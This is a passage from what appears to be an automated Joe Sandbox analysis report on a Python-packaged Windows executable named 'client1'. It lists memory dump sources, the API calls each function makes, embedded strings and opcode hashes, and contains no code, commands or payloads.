                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$ContextErr_FormatObject_SubtypeType_Var_
                                                    • String ID:
                                                    • API String ID: 2679858911-0
                                                    • Opcode ID: c7fd0e211f10f72f34beba943990120b88892db11ff7f0b1b49b95f2add7cb6d
                                                    • Instruction ID: bbe51d7b0a5759b77e2b5fd79ca937ae4791b5de29a6a20e6a4e8337ba281855
                                                    • Opcode Fuzzy Hash: c7fd0e211f10f72f34beba943990120b88892db11ff7f0b1b49b95f2add7cb6d
                                                    • Instruction Fuzzy Hash: A84186B2E0AA12D4E7568F35D4240BE27A8EB44B94F0400B2DF0E56794DE3CE943C3A0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$FromLong_Ssize_t$MultiplyNumber_
                                                    • String ID:
                                                    • API String ID: 3214704217-0
                                                    • Opcode ID: 077d120661e2442c2d7c8d046fe9cbc6f5cfd7a77582022ebf4a7fc655b50c7f
                                                    • Instruction ID: 50b03805f7f1fbeec8b55b712d6f2173d76378aa463ade22dfbbd27613d2ebdf
                                                    • Opcode Fuzzy Hash: 077d120661e2442c2d7c8d046fe9cbc6f5cfd7a77582022ebf4a7fc655b50c7f
                                                    • Instruction Fuzzy Hash: EA315261B0BA1281EE564F36E59427C53A0AF55BF4F089639DE3E067E5DE2CE4418301
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$FromLong_Ssize_t$Number_Subtract
                                                    • String ID:
                                                    • API String ID: 2424657569-0
                                                    • Opcode ID: f24f7a854c09d2b2b1a08854a685ffdd7303fa68c210250e5475e1596f9aeefc
                                                    • Instruction ID: aa01e571820887fdf78be64b69313930f8840b642f9837480bf5f22d90426bb9
                                                    • Opcode Fuzzy Hash: f24f7a854c09d2b2b1a08854a685ffdd7303fa68c210250e5475e1596f9aeefc
                                                    • Instruction Fuzzy Hash: C6219372B0BA4281EE1A8B36E59417D63A0EF89BE4F089135DF7D077A9DE2CE4458301
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,?,00007FF79F63444D,?,?,?,?,00007FF79F63DDA7,?,?,00000000,00007FF79F63A8B6,?,?,?), ref: 00007FF79F63A7A7
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F63444D,?,?,?,?,00007FF79F63DDA7,?,?,00000000,00007FF79F63A8B6,?,?,?), ref: 00007FF79F63A7DD
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F63444D,?,?,?,?,00007FF79F63DDA7,?,?,00000000,00007FF79F63A8B6,?,?,?), ref: 00007FF79F63A80A
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F63444D,?,?,?,?,00007FF79F63DDA7,?,?,00000000,00007FF79F63A8B6,?,?,?), ref: 00007FF79F63A81B
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF79F63444D,?,?,?,?,00007FF79F63DDA7,?,?,00000000,00007FF79F63A8B6,?,?,?), ref: 00007FF79F63A82C
                                                    • SetLastError.KERNEL32(?,?,?,00007FF79F63444D,?,?,?,?,00007FF79F63DDA7,?,?,00000000,00007FF79F63A8B6,?,?,?), ref: 00007FF79F63A847
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Value$ErrorLast
                                                    • String ID:
                                                    • API String ID: 2506987500-0
                                                    • Opcode ID: de2209737f62c3ef05340c1457763ccac6bfd4de9bf3f87891e85fc6fda23dbb
                                                    • Instruction ID: 54e04fc50cd6634a31d28a0e04e6114a808eb9d4249d7a0ded5da86cd2ab78ff
                                                    • Opcode Fuzzy Hash: de2209737f62c3ef05340c1457763ccac6bfd4de9bf3f87891e85fc6fda23dbb
                                                    • Instruction Fuzzy Hash: 9E113B28E0D3C242FA747B315A811FAE25B5F55BB0F844734D83E17AD6DEADB402A630
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: strchr
                                                    • String ID: +- $<>=^$z
                                                    • API String ID: 2830005266-2919174415
                                                    • Opcode ID: d3f128c2def1c522b420359bfec4aefe832e3c5070af67f1566c0b2452d1659d
                                                    • Instruction ID: d0921964fb3e0dec5693086098d5dc3ca97bff2266a8badc61aa6a5e5fb4038d
                                                    • Opcode Fuzzy Hash: d3f128c2def1c522b420359bfec4aefe832e3c5070af67f1566c0b2452d1659d
                                                    • Instruction Fuzzy Hash: D2119391B0F952C0FE16CF24D94027D7AA8AB45F44F4860B6CE6D02664CF2CE05BCB20
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: FreeMem_
                                                    • String ID: 0
                                                    • API String ID: 4096353137-4108050209
                                                    APIs
                                                    • memmove.VCRUNTIME140(?,?,00000000,00000000,00000000,?,?,00000000,00007FFBAA70CA90,?,?,00000000,?,?,00007FFBAA6FC634), ref: 00007FFBAA70CC02
                                                    • memmove.VCRUNTIME140(?,?,00000000,00000000,00000000,?,?,00000000,00007FFBAA70CA90,?,?,00000000,?,?,00007FFBAA6FC634), ref: 00007FFBAA70CC2D
                                                    • memset.VCRUNTIME140(?,?,00000000,00000000,00000000,?,?,00000000,00007FFBAA70CA90,?,?,00000000,?,?,00007FFBAA6FC634), ref: 00007FFBAA70CCB6
                                                    • memset.VCRUNTIME140(?,?,00000000,00000000,00000000,?,?,00000000,00007FFBAA70CA90,?,?,00000000,?,?,00007FFBAA6FC634), ref: 00007FFBAA70CD3F
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    Similarity
                                                    • API ID: memmovememset
                                                    • String ID:
                                                    • API String ID: 1288253900-0
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    Similarity
                                                    • API ID: FreeMem_
                                                    • String ID: 0
                                                    • API String ID: 4096353137-4108050209
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    Similarity
                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                    • String ID: csm$f
                                                    • API String ID: 2395640692-629598281
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    Similarity
                                                    • API ID: SubtypeType_
                                                    • String ID: bool$float$mess_ratio$str
                                                    • API String ID: 2891779845-3758540285
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    Similarity
                                                    • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                    • String ID: Unhandled exception in script
                                                    • API String ID: 3081866767-2699770090
                                                    APIs
                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00007FF79F627744,?,?,?,?,?,?,?,?,?,?,?,00007FF79F62101D), ref: 00007FF79F622654
                                                      • Part of subcall function 00007FF79F6274B0: GetLastError.KERNEL32(00000000,00007FF79F6226A0), ref: 00007FF79F6274D7
                                                      • Part of subcall function 00007FF79F6274B0: FormatMessageW.KERNEL32(00000000,00007FF79F6226A0), ref: 00007FF79F627506
                                                      • Part of subcall function 00007FF79F627A30: MultiByteToWideChar.KERNEL32 ref: 00007FF79F627A6A
                                                    • MessageBoxW.USER32 ref: 00007FF79F62272C
                                                    • MessageBoxA.USER32 ref: 00007FF79F622748
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    Similarity
                                                    • API ID: Message$ErrorLast$ByteCharFormatMultiWide
                                                    • String ID: %s%s: %s$Fatal error detected
                                                    • API String ID: 2806210788-2410924014
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    Similarity
                                                    • API ID: Dealloc$Arg_ContextErr_KeywordsParseStringTupleVar_
                                                    • String ID: optional argument must be a context
                                                    • API String ID: 3219279049-3732962867
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    Similarity
                                                    • API ID: Dealloc$Arg_ContextErr_KeywordsParseStringTupleVar_
                                                    • String ID: optional argument must be a context
                                                    • API String ID: 3219279049-3732962867
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    Similarity
                                                    • API ID: Dealloc$Arg_ContextErr_KeywordsParseStringTupleVar_
                                                    • String ID: optional argument must be a context
                                                    • API String ID: 3219279049-3732962867
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    Similarity
                                                    • API ID: Dealloc$Arg_ContextErr_KeywordsParseStringTupleVar_
                                                    • String ID: optional argument must be a context
                                                    • API String ID: 3219279049-3732962867
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    Similarity
                                                    • API ID: Dealloc$List_$AppendBuildValue
                                                    • String ID: O(nsnniiOO)
                                                    • API String ID: 2314222879-2972526296
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    Similarity
                                                    • API ID: Dealloc$AttrObject_PackTuple_
                                                    • String ID: <module>
                                                    • API String ID: 4195104747-217463007
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_Object
                                                    • String ID: internal error in flags_as_exception
                                                    • API String ID: 1617383179-882050087
                                                    • Opcode ID: aa72b05d44a841521da234b747580fd94131bc0fc46fdc4ae2520d83be008423
                                                    • Instruction ID: 47abd22d942b02c092d39737dd500412b195f759e9878fd9f4573ec7abaa892f
                                                    • Opcode Fuzzy Hash: aa72b05d44a841521da234b747580fd94131bc0fc46fdc4ae2520d83be008423
                                                    • Instruction Fuzzy Hash: E1212CA1A0BA02C1EB678F39D85437E26E9AB49F44F0421B6DD0D42764DE2DE45BC721
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$AttrObject_PackTuple_
                                                    • String ID: <module>
                                                    • API String ID: 4195104747-217463007
                                                    • Opcode ID: 91db4bdcbe56209661502fd67bbc6f2769c22d5eab679d7ef81084a84b245009
                                                    • Instruction ID: ef50cf56dd0bacdefa39b10bfa9bf029edfda320e6ec6a81b439177d739e9d8a
                                                    • Opcode Fuzzy Hash: 91db4bdcbe56209661502fd67bbc6f2769c22d5eab679d7ef81084a84b245009
                                                    • Instruction Fuzzy Hash: 0D21B0E5E0BF4291EA12AF76F8802B823A4BF45B90F44807ADC6D07370DF3CA5658340
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$AttrObject_PackTuple_
                                                    • String ID: <module>
                                                    • API String ID: 4195104747-217463007
                                                    • Opcode ID: 95c1403db506077c69335a7ef06657fa80bb0139eb0d032872015d31a2af1b6c
                                                    • Instruction ID: 40bf90072aac5f9d9c8132dac153d1c04d1ad6fe2966b3f10c09ddbda9348158
                                                    • Opcode Fuzzy Hash: 95c1403db506077c69335a7ef06657fa80bb0139eb0d032872015d31a2af1b6c
                                                    • Instruction Fuzzy Hash: 6A219EF6A0BE1291EA169F76F8946B827A4AF15B90F44C13ACC6D47370EF3CA565C340
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$AttrObject_PackTuple_
                                                    • String ID: <module>
                                                    • API String ID: 4195104747-217463007
                                                    • Opcode ID: 3965a657abab878e03acf1ac5dd8a83191bbcc75135b225808ee97793d61faec
                                                    • Instruction ID: cca4e0799c3f14ef1ad820411d8074e5f7e65c60289da9db61d2de58a8bf4289
                                                    • Opcode Fuzzy Hash: 3965a657abab878e03acf1ac5dd8a83191bbcc75135b225808ee97793d61faec
                                                    • Instruction Fuzzy Hash: 13219CE5A0BF1684FA02AF76F8902B923A4BF05B90F48817ADC6D07274DF3CA465D340
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    • Associated: 00000002.00000002.2693275344.00007FFBAA730000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA735000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA792000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7DE000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E1000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E6000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693474597.00007FFBAA843000.00000004.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: DoubleErr_Float_FromNumericStringSubtypeType_Unicode_
                                                    • String ID: not a numeric character
                                                    • API String ID: 1034370217-2058156748
                                                    • Opcode ID: e94a4cbcbf0e5bcd60c879edbbe527308af40d50addda8a0dc073dd71fed3554
                                                    • Instruction ID: 03cad2260873cf25666961ce4fd7172d6943871b6700e707ac110c81beffe27b
                                                    • Opcode Fuzzy Hash: e94a4cbcbf0e5bcd60c879edbbe527308af40d50addda8a0dc073dd71fed3554
                                                    • Instruction Fuzzy Hash: 6411A5A1B1F962D5EA5BAF31E41403B63ADAF44B85F0681B0CF0E06658DF2CE4878230
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: String$Arg_DeallocErr_FromKeywordsParseTupleUnicode_
                                                    • String ID: optional argument must be a context
                                                    • API String ID: 1452123296-3732962867
                                                    • Opcode ID: f6cd9f5c3af5eb1d68dd269a83acbfae982e07940d7fa5335d6679faeb9bc316
                                                    • Instruction ID: 3fd82a3b1c13850adcb028b127bd2d1b631fe5b025bf8371ba36870f5a49b3e9
                                                    • Opcode Fuzzy Hash: f6cd9f5c3af5eb1d68dd269a83acbfae982e07940d7fa5335d6679faeb9bc316
                                                    • Instruction Fuzzy Hash: 211164E1A0AA03D0EA028F35E8500BB67ECAF84B95F4000B2DD0E427B4DE6DE14BC360
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    • Associated: 00000002.00000002.2693275344.00007FFBAA730000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA735000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA792000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7DE000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E1000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E6000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693474597.00007FFBAA843000.00000004.00000001.01000000.00000015.sdmp
                                                    • Associated: 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: DecimalDigitErr_FromLongLong_StringSubtypeType_Unicode_
                                                    • String ID: not a decimal
                                                    • API String ID: 3750391552-3590249192
                                                    • Opcode ID: 1cd0ce8ce41aec67d618eaf50ce9a381a57b186b45043069d79b570d0f92dffd
                                                    • Instruction ID: 4b5ad37267d36307d72b7a8850f9b3def354bd7a650be57425d101dfbb65fa26
                                                    • Opcode Fuzzy Hash: 1cd0ce8ce41aec67d618eaf50ce9a381a57b186b45043069d79b570d0f92dffd
                                                    • Instruction Fuzzy Hash: 3F11A7A1B0AA52C1EF1A6F35E41813E63A8AF44B85F4684B4CE4F47650DF2CE8438330
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmp
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Dealloc$Dict_ItemList_
                                                    • String ID: <module>
                                                    • API String ID: 3473312925-217463007
                                                    • Opcode ID: 636bfd1e1ccb7f652e57f7f366bec5d5727cc02f6528fe760d78231c756f7c15
                                                    • Instruction ID: f8ef18497f3b2c0a8ffeb4984dc7be0a11b7d3df77b53b15d5ef9d68dd65f546
                                                    • Opcode Fuzzy Hash: 636bfd1e1ccb7f652e57f7f366bec5d5727cc02f6528fe760d78231c756f7c15
                                                    • Instruction Fuzzy Hash: 1B11F7E6E0BA1281FA578B77E9902791A64AF55BD5F04C13ACD3E077B0EE2CB4958301
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmp
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: ContextDeallocErr_FormatFreeFromMem_MemoryUnicode_Var_
                                                    • String ID: Decimal('%s')
                                                    • API String ID: 2420315507-440159776
                                                    • Opcode ID: 3c3e8f2afc2c8420574c3dba0923bb3508b6b31995b6da3f75ecb808d41e5951
                                                    • Instruction ID: f5404bfa4f06fe43b3352b67f0643d48f95e61d0cb48394e754e5bf1d4e57797
                                                    • Opcode Fuzzy Hash: 3c3e8f2afc2c8420574c3dba0923bb3508b6b31995b6da3f75ecb808d41e5951
                                                    • Instruction Fuzzy Hash: CCF081A0A0F603C1EA1B5F39E85407E66A9AF48F80B482071CD1E073A5EE2CE44B8760
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
